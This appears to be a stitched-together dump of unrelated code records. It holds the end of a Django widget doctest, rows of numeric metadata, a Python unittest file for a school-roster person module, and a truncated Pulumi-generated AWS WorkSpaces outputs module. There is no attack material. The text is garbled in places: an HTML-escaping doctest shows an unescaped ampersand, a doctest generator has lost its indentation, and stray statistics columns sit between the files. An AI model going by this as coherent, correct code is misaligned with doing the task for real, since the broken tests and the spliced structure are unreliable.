>>> unicode(w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')]))
u'<ul>\n<li><label><input checked="checked" type="radio" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="radio" name="email" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>'
# Attributes provided at instantiation are passed to the constituent inputs
>>> w = RadioSelect(attrs={'id':'foo'})
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label for="foo_0"><input checked="checked" type="radio" id="foo_0" value="J" name="beatle" /> John</label></li>
<li><label for="foo_1"><input type="radio" id="foo_1" value="P" name="beatle" /> Paul</label></li>
<li><label for="foo_2"><input type="radio" id="foo_2" value="G" name="beatle" /> George</label></li>
<li><label for="foo_3"><input type="radio" id="foo_3" value="R" name="beatle" /> Ringo</label></li>
</ul>
# Attributes provided at render-time are passed to the constituent inputs
>>> w = RadioSelect()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')), attrs={'id':'bar'})
<ul>
<li><label for="bar_0"><input checked="checked" type="radio" id="bar_0" value="J" name="beatle" /> John</label></li>
<li><label for="bar_1"><input type="radio" id="bar_1" value="P" name="beatle" /> Paul</label></li>
<li><label for="bar_2"><input type="radio" id="bar_2" value="G" name="beatle" /> George</label></li>
<li><label for="bar_3"><input type="radio" id="bar_3" value="R" name="beatle" /> Ringo</label></li>
</ul>
# CheckboxSelectMultiple Widget ###############################################
>>> w = CheckboxSelectMultiple()
>>> print w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
>>> print w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
>>> print w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If the value is None, none of the options are selected:
>>> print w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If multiple values are given, but some of them are not valid, the valid ones are selected:
>>> print w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
The value is compared to its str():
>>> print w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
>>> print w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
>>> print w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
The 'choices' argument can be any iterable:
>>> def get_choices():
... for i in range(5):
... yield (i, i)
>>> print w.render('nums', [2], choices=get_choices())
<ul>
<li><label><input type="checkbox" name="nums" value="0" /> 0</label></li>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
</ul>
You can also pass 'choices' to the constructor:
>>> w = CheckboxSelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('nums', [2])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('nums', [2], choices=[(4, 4), (5, 5)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
<li><label><input type="checkbox" name="nums" value="5" /> 5</label></li>
</ul>
# Choices are escaped correctly
>>> print w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me'))))
<ul>
<li><label><input type="checkbox" name="escape" value="1" /> 1</label></li>
<li><label><input type="checkbox" name="escape" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="escape" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="escape" value="bad" /> you & me</label></li>
<li><label><input type="checkbox" name="escape" value="good" /> you > me</label></li>
</ul>
# Test the usage of _has_changed
>>> w._has_changed(None, None)
False
>>> w._has_changed([], None)
False
>>> w._has_changed(None, [u'1'])
True
>>> w._has_changed([1, 2], [u'1', u'2'])
False
>>> w._has_changed([1, 2], [u'1'])
True
>>> w._has_changed([1, 2], [u'1', u'3'])
True
# Unicode choices are correctly rendered as HTML
>>> w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<ul>\n<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>\n<li><label><input type="checkbox" name="nums" value="2" /> 2</label></li>\n<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>\n<li><label><input checked="checked" type="checkbox" name="nums" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="checkbox" name="nums" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>'
# MultiWidget #################################################################
>>> class MyMultiWidget(MultiWidget):
... def decompress(self, value):
... if value:
... return value.split('__')
... return ['', '']
... def format_output(self, rendered_widgets):
... return u'<br />'.join(rendered_widgets)
>>> w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})))
>>> w.render('name', ['john', 'lennon'])
u'<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />'
>>> w.render('name', 'john__lennon')
u'<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />'
>>> w.render('name', 'john__lennon', attrs={'id':'foo'})
u'<input id="foo_0" type="text" class="big" value="john" name="name_0" /><br /><input id="foo_1" type="text" class="small" value="lennon" name="name_1" />'
>>> w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})), attrs={'id': 'bar'})
>>> w.render('name', ['john', 'lennon'])
u'<input id="bar_0" type="text" class="big" value="john" name="name_0" /><br /><input id="bar_1" type="text" class="small" value="lennon" name="name_1" />'
>>> w = MyMultiWidget(widgets=(TextInput(), TextInput()))
# test with no initial data
>>> w._has_changed(None, [u'john', u'lennon'])
True
# test when the data is the same as initial
>>> w._has_changed(u'john__lennon', [u'john', u'lennon'])
False
# test when the first widget's data has changed
>>> w._has_changed(u'john__lennon', [u'alfred', u'lennon'])
True
# test when the last widget's data has changed. this ensures that it is not
# short circuiting while testing the widgets.
>>> w._has_changed(u'john__lennon', [u'john', u'denver'])
True
# SplitDateTimeWidget #########################################################
>>> w = SplitDateTimeWidget()
>>> w.render('date', '')
u'<input type="text" name="date_0" /><input type="text" name="date_1" />'
>>> w.render('date', None)
u'<input type="text" name="date_0" /><input type="text" name="date_1" />'
>>> w.render('date', datetime.datetime(2006, 1, 10, 7, 30))
u'<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />'
>>> w.render('date', [datetime.date(2006, 1, 10), datetime.time(7, 30)])
u'<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />'
You can also pass 'attrs' to the constructor. In this case, the attrs will be
included on both widgets.
>>> w = SplitDateTimeWidget(attrs={'class': 'pretty'})
>>> w.render('date', datetime.datetime(2006, 1, 10, 7, 30))
u'<input type="text" class="pretty" value="2006-01-10" name="date_0" /><input type="text" class="pretty" value="07:30:00" name="date_1" />'
>>> w._has_changed(datetime.datetime(2008, 5, 5, 12, 40, 00), [u'2008-05-05', u'12:40:00'])
False
>>> w._has_changed(datetime.datetime(2008, 5, 5, 12, 40, 00), [u'2008-05-05', u'12:41:00'])
True
# DateTimeInput ###############################################################
>>> w = DateTimeInput()
>>> w.render('date', None)
u'<input type="text" name="date" />'
>>> d = datetime.datetime(2007, 9, 17, 12, 51, 34, 482548)
>>> print d
2007-09-17 12:51:34.482548
The microseconds are trimmed on display, by default.
>>> w.render('date', d)
u'<input type="text" name="date" value="2007-09-17 12:51:34" />'
>>> w.render('date', datetime.datetime(2007, 9, 17, 12, 51, 34))
u'<input type="text" name="date" value="2007-09-17 12:51:34" />'
>>> w.render('date', datetime.datetime(2007, 9, 17, 12, 51))
u'<input type="text" name="date" value="2007-09-17 12:51:00" />'
"""
| 44.826764
| 553
| 0.632642
| 7,218
| 48,906
| 4.259075
| 0.057911
| 0.051818
| 0.036692
| 0.036953
| 0.84731
| 0.825971
| 0.809804
| 0.791588
| 0.769501
| 0.735931
| 0
| 0.03035
| 0.103955
| 48,906
| 1,090
| 554
| 44.86789
| 0.67117
| 0.000429
| 0
| 0.557018
| 0
| 0.138158
| 0.998935
| 0.20251
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.087719
| 0.02193
| 0
| 0.02193
| 0.04386
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
40eaa44a8b131c34576218ca79e8c157527e0c5d
| 16,752
|
py
|
Python
|
TEST/person_test.py
|
djfkahn/MemberHubDirectoryTools
|
a103ef33f6e0907e57ac8d9e565ed8fef47554da
|
[
"Apache-2.0"
] | 2
|
2015-05-28T20:27:38.000Z
|
2019-10-17T00:42:54.000Z
|
TEST/person_test.py
|
djfkahn/MemberHubDirectoryTools
|
a103ef33f6e0907e57ac8d9e565ed8fef47554da
|
[
"Apache-2.0"
] | 96
|
2015-04-17T16:20:49.000Z
|
2022-01-15T00:41:26.000Z
|
TEST/person_test.py
|
djfkahn/MemberHubDirectoryTools
|
a103ef33f6e0907e57ac8d9e565ed8fef47554da
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import os
import hub_map_tools
import person
data_file_path = os.path.abspath("./roster_tools_tests/")
hub_file_name = data_file_path + "/hub_map.csv"
common_hub_map = hub_map_tools.ReadHubMapFromFile(hub_file_name)
class UT_RosterConstructor(unittest.TestCase):
def test_01_valid_adult(self):
result = person.RosterPerson(last_name ='A',
first_name ='B',
family_relation ='Adult',
teacher ='',
hub_map = common_hub_map)
self.assertEqual('A' , result.last_name)
self.assertEqual('B' , result.first_name)
self.assertEqual('Adult', result.family_relation)
self.assertEqual([] , result.hubs)
def test_02_valid_child(self):
result = person.RosterPerson(last_name='A',
first_name='B',
family_relation='Child',
teacher ='',
hub_map=common_hub_map)
self.assertEqual('A' , result.last_name)
self.assertEqual('B' , result.first_name)
self.assertEqual('Child', result.family_relation)
self.assertEqual([] , result.hubs)
def test_03_invalid_adult(self):
result = person.RosterPerson(last_name=None,
first_name='B',
family_relation='Child',
teacher ='',
hub_map=common_hub_map)
self.assertEqual(None, result.last_name)
self.assertEqual(None, result.first_name)
self.assertEqual(None, result.family_relation)
self.assertEqual([] , result.hubs)
def test_04_invalid_child(self):
result = person.RosterPerson(last_name='A',
first_name=None,
family_relation ='Child',
teacher ='',
hub_map=common_hub_map)
self.assertEqual(None, result.last_name)
self.assertEqual(None, result.first_name)
self.assertEqual(None, result.family_relation)
self.assertEqual([] , result.hubs)
def test_05_unknown_relation(self):
result = person.RosterPerson(last_name='A',
first_name='B',
family_relation =None,
teacher ='',
hub_map=common_hub_map)
self.assertEqual(None, result.last_name)
self.assertEqual(None, result.first_name)
self.assertEqual(None, result.family_relation)
self.assertEqual([] , result.hubs)
class UT_IsSame(unittest.TestCase):
def test_01_same_person(self):
person_A = person.RosterPerson(last_name='A',
first_name='B',
family_relation ='Adult',
teacher ='',
hub_map=common_hub_map)
self.assertTrue(person_A.IsSame(person_A))
def test_02_different_first_name(self):
person_A = person.RosterPerson(last_name ='Z',
first_name ='A',
family_relation ='Adult',
teacher ='',
hub_map =common_hub_map)
person_B = person.RosterPerson(last_name ='Z',
first_name ='B',
family_relation ='Adult',
teacher ='',
hub_map =common_hub_map)
self.assertFalse(person_A.IsSame(person_B))
def test_03_different_last_name(self):
person_A = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Adult',
teacher ='',
hub_map=common_hub_map)
person_B = person.RosterPerson(last_name='Y',
first_name='A',
family_relation='Adult',
teacher ='',
hub_map=common_hub_map)
self.assertFalse(person_A.IsSame(person_B))
def test_04_different_relation(self):
person_A = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Adult',
teacher ='',
hub_map=common_hub_map)
person_B = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Child',
teacher ='',
hub_map=common_hub_map)
self.assertFalse(person_A.IsSame(person_B))
@unittest.expectedFailure
def test_05_different_hub(self):
person_A = person.RosterPerson(last_name='Z',
first_name='A',
family_relation ='Adult',
teacher ='First, John',
hub_map=common_hub_map)
person_B = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Adult',
teacher ='Second, Jane',
hub_map=common_hub_map)
self.assertFalse(person_A.IsSame(person_B))
@unittest.expectedFailure
def test_06_same_and_more_hub_adult(self):
person_A = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Adult',
teacher ='First, John',
hub_map=common_hub_map)
person_B = person.RosterPerson(last_name='Z',
first_name='A',
family_relation ='Adult',
teacher ='First, John',
hub_map=common_hub_map)
person_B.hubs.append('2222')
self.assertFalse(person_A.IsSame(person_B))
@unittest.expectedFailure
def test_07_same_and_more_hub_child(self):
person_A = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Child',
teacher ='First, John',
hub_map=common_hub_map)
person_B = person.RosterPerson(last_name='Z',
first_name='A',
family_relation='Child',
teacher ='First, John',
hub_map=common_hub_map)
person_B.hubs.append('2222')
self.assertFalse(person_A.IsSame(person_B))
class UT_DirectoryConstructor(unittest.TestCase):
def test_01_set_adult(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Adult',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertEqual('A', result.first_name)
self.assertEqual('C', result.last_name)
self.assertEqual('1234', result.person_id)
self.assertEqual('5678', result.family_id)
self.assertEqual('Adult',result.family_relation)
self.assertEqual('email',result.email)
self.assertEqual(['0000'],result.hubs)
def test_02_set_child(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Child',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertEqual('A', result.first_name)
self.assertEqual('C', result.last_name)
self.assertEqual('1234', result.person_id)
self.assertEqual('5678', result.family_id)
self.assertEqual('Child',result.family_relation)
self.assertEqual('email',result.email)
self.assertEqual(['0000'],result.hubs)
def test_03_set_no_first_name(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = '',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Child',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertIsNone(result.last_name)
self.assertIsNone(result.first_name)
self.assertIsNone(result.family_relation)
self.assertEqual([], result.hubs)
def test_04_set_no_last_name(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = '',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Child',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertIsNone(result.last_name)
self.assertIsNone(result.first_name)
self.assertIsNone(result.family_relation)
self.assertEqual([], result.hubs)
def test_05_set_no_relation(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = '',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertIsNone(result.last_name)
self.assertIsNone(result.first_name)
self.assertIsNone(result.family_relation)
self.assertEqual([], result.hubs)
def test_06_set_other_relation(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Other',
hub_name_list = 'Kinder (Room 0)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertIsNone(result.last_name)
self.assertIsNone(result.first_name)
self.assertIsNone(result.family_relation)
self.assertEqual([], result.hubs)
def test_07_set_no_hubs(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Child',
hub_name_list = ''.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertEqual('A', result.first_name)
self.assertEqual('C', result.last_name)
self.assertEqual('1234', result.person_id)
self.assertEqual('5678', result.family_id)
self.assertEqual('Child',result.family_relation)
self.assertEqual('email',result.email)
self.assertEqual([],result.hubs)
def test_02_set_multiple_hubs(self):
result = person.DirectoryPerson(person_id = '1234',
last_name = 'C',
first_name = 'A',
middle_name = '',
suffix = '',
email = 'email',
family_id = '5678',
family_relation = 'Child',
hub_name_list = 'Kinder (Room 0);First (Room 1)'.split(';'),
account_created = '',
account_updated = '',
hub_map = common_hub_map)
self.assertEqual('A', result.first_name)
self.assertEqual('C', result.last_name)
self.assertEqual('1234', result.person_id)
self.assertEqual('5678', result.family_id)
self.assertEqual('Child',result.family_relation)
self.assertEqual('email',result.email)
self.assertEqual(['0000','1111'],result.hubs)
if __name__ == '__main__':
unittest.main()
| 52.845426
| 102
| 0.403534
| 1,263
| 16,752
| 5.041964
| 0.071259
| 0.052764
| 0.050879
| 0.061244
| 0.910019
| 0.897613
| 0.896357
| 0.884108
| 0.881753
| 0.865421
| 0
| 0.020593
| 0.513013
| 16,752
| 317
| 103
| 52.845426
| 0.75999
| 0
| 0
| 0.843537
| 0
| 0
| 0.037366
| 0.001254
| 0
| 0
| 0
| 0
| 0.241497
| 1
| 0.068027
| false
| 0
| 0.013605
| 0
| 0.091837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9052ba263f84153268f03213c0429078fd588b4b
| 35,321
|
py
|
Python
|
sdk/python/pulumi_aws/workspaces/outputs.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 260
|
2018-06-18T14:57:00.000Z
|
2022-03-29T11:41:03.000Z
|
sdk/python/pulumi_aws/workspaces/outputs.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 1,154
|
2018-06-19T20:38:20.000Z
|
2022-03-31T19:48:16.000Z
|
sdk/python/pulumi_aws/workspaces/outputs.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 115
|
2018-06-28T03:20:27.000Z
|
2022-03-29T11:41:06.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'DirectorySelfServicePermissions',
'DirectoryWorkspaceAccessProperties',
'DirectoryWorkspaceCreationProperties',
'IpGroupRule',
'WorkspaceWorkspaceProperties',
'GetBundleComputeTypeResult',
'GetBundleRootStorageResult',
'GetBundleUserStorageResult',
'GetDirectorySelfServicePermissionResult',
'GetDirectoryWorkspaceAccessPropertyResult',
'GetDirectoryWorkspaceCreationPropertyResult',
'GetWorkspaceWorkspacePropertyResult',
]
@pulumi.output_type
class DirectorySelfServicePermissions(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "changeComputeType":
suggest = "change_compute_type"
elif key == "increaseVolumeSize":
suggest = "increase_volume_size"
elif key == "rebuildWorkspace":
suggest = "rebuild_workspace"
elif key == "restartWorkspace":
suggest = "restart_workspace"
elif key == "switchRunningMode":
suggest = "switch_running_mode"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DirectorySelfServicePermissions. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DirectorySelfServicePermissions.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DirectorySelfServicePermissions.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
change_compute_type: Optional[bool] = None,
increase_volume_size: Optional[bool] = None,
rebuild_workspace: Optional[bool] = None,
restart_workspace: Optional[bool] = None,
switch_running_mode: Optional[bool] = None):
"""
:param bool change_compute_type: Whether WorkSpaces directory users can change the compute type (bundle) for their workspace. Default `false`.
:param bool increase_volume_size: Whether WorkSpaces directory users can increase the volume size of the drives on their workspace. Default `false`.
:param bool rebuild_workspace: Whether WorkSpaces directory users can rebuild the operating system of a workspace to its original state. Default `false`.
:param bool restart_workspace: Whether WorkSpaces directory users can restart their workspace. Default `true`.
:param bool switch_running_mode: Whether WorkSpaces directory users can switch the running mode of their workspace. Default `false`.
"""
if change_compute_type is not None:
pulumi.set(__self__, "change_compute_type", change_compute_type)
if increase_volume_size is not None:
pulumi.set(__self__, "increase_volume_size", increase_volume_size)
if rebuild_workspace is not None:
pulumi.set(__self__, "rebuild_workspace", rebuild_workspace)
if restart_workspace is not None:
pulumi.set(__self__, "restart_workspace", restart_workspace)
if switch_running_mode is not None:
pulumi.set(__self__, "switch_running_mode", switch_running_mode)
@property
@pulumi.getter(name="changeComputeType")
def change_compute_type(self) -> Optional[bool]:
"""
Whether WorkSpaces directory users can change the compute type (bundle) for their workspace. Default `false`.
"""
return pulumi.get(self, "change_compute_type")
@property
@pulumi.getter(name="increaseVolumeSize")
def increase_volume_size(self) -> Optional[bool]:
"""
Whether WorkSpaces directory users can increase the volume size of the drives on their workspace. Default `false`.
"""
return pulumi.get(self, "increase_volume_size")
@property
@pulumi.getter(name="rebuildWorkspace")
def rebuild_workspace(self) -> Optional[bool]:
"""
Whether WorkSpaces directory users can rebuild the operating system of a workspace to its original state. Default `false`.
"""
return pulumi.get(self, "rebuild_workspace")
@property
@pulumi.getter(name="restartWorkspace")
def restart_workspace(self) -> Optional[bool]:
"""
Whether WorkSpaces directory users can restart their workspace. Default `true`.
"""
return pulumi.get(self, "restart_workspace")
@property
@pulumi.getter(name="switchRunningMode")
def switch_running_mode(self) -> Optional[bool]:
"""
Whether WorkSpaces directory users can switch the running mode of their workspace. Default `false`.
"""
return pulumi.get(self, "switch_running_mode")
@pulumi.output_type
class DirectoryWorkspaceAccessProperties(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "deviceTypeAndroid":
suggest = "device_type_android"
elif key == "deviceTypeChromeos":
suggest = "device_type_chromeos"
elif key == "deviceTypeIos":
suggest = "device_type_ios"
elif key == "deviceTypeLinux":
suggest = "device_type_linux"
elif key == "deviceTypeOsx":
suggest = "device_type_osx"
elif key == "deviceTypeWeb":
suggest = "device_type_web"
elif key == "deviceTypeWindows":
suggest = "device_type_windows"
elif key == "deviceTypeZeroclient":
suggest = "device_type_zeroclient"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DirectoryWorkspaceAccessProperties. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DirectoryWorkspaceAccessProperties.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DirectoryWorkspaceAccessProperties.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
device_type_android: Optional[str] = None,
device_type_chromeos: Optional[str] = None,
device_type_ios: Optional[str] = None,
device_type_linux: Optional[str] = None,
device_type_osx: Optional[str] = None,
device_type_web: Optional[str] = None,
device_type_windows: Optional[str] = None,
device_type_zeroclient: Optional[str] = None):
"""
:param str device_type_android: Indicates whether users can use Android devices to access their WorkSpaces.
:param str device_type_chromeos: Indicates whether users can use Chromebooks to access their WorkSpaces.
:param str device_type_ios: Indicates whether users can use iOS devices to access their WorkSpaces.
:param str device_type_linux: Indicates whether users can use Linux clients to access their WorkSpaces.
:param str device_type_osx: Indicates whether users can use macOS clients to access their WorkSpaces.
:param str device_type_web: Indicates whether users can access their WorkSpaces through a web browser.
:param str device_type_windows: Indicates whether users can use Windows clients to access their WorkSpaces.
:param str device_type_zeroclient: Indicates whether users can use zero client devices to access their WorkSpaces.
"""
if device_type_android is not None:
pulumi.set(__self__, "device_type_android", device_type_android)
if device_type_chromeos is not None:
pulumi.set(__self__, "device_type_chromeos", device_type_chromeos)
if device_type_ios is not None:
pulumi.set(__self__, "device_type_ios", device_type_ios)
if device_type_linux is not None:
pulumi.set(__self__, "device_type_linux", device_type_linux)
if device_type_osx is not None:
pulumi.set(__self__, "device_type_osx", device_type_osx)
if device_type_web is not None:
pulumi.set(__self__, "device_type_web", device_type_web)
if device_type_windows is not None:
pulumi.set(__self__, "device_type_windows", device_type_windows)
if device_type_zeroclient is not None:
pulumi.set(__self__, "device_type_zeroclient", device_type_zeroclient)
@property
@pulumi.getter(name="deviceTypeAndroid")
def device_type_android(self) -> Optional[str]:
"""
Indicates whether users can use Android devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_android")
@property
@pulumi.getter(name="deviceTypeChromeos")
def device_type_chromeos(self) -> Optional[str]:
"""
Indicates whether users can use Chromebooks to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_chromeos")
@property
@pulumi.getter(name="deviceTypeIos")
def device_type_ios(self) -> Optional[str]:
"""
Indicates whether users can use iOS devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_ios")
@property
@pulumi.getter(name="deviceTypeLinux")
def device_type_linux(self) -> Optional[str]:
"""
Indicates whether users can use Linux clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_linux")
@property
@pulumi.getter(name="deviceTypeOsx")
def device_type_osx(self) -> Optional[str]:
"""
Indicates whether users can use macOS clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_osx")
@property
